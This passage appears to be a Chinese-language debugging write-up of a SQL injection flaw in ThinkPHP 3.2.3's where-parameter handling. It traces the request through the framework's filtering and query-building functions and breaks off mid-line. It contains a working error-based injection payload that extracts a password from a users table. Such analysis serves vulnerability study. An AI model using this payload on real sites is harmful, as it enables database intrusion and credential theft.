环境搭建下载源码
编辑器使用了phpstrom
配置数据库
添加测试数据
Thinkphp3.2.3 where注入payload
?id[where]=1 and 1=updatexml(1,concat(0x7e,(select password from users limit 1),0x7e),1)%23断点
分析经过htmlspecialchars过滤
于442行通过think_filter函数进行过滤
经过ThinkPHP/Library/Think/Model.class.php:779的find()方法
满足条件则进入
强制进行转换,转换为了int形
带入查询
步骤
id=1' -> I() -> find() -> __parseOptions() ->_parseType()
满足条件才能进去__parseOptions()方法条件
if (isset($options['where']) && is_array($options['where']) && !empty($fields) && !isset($options[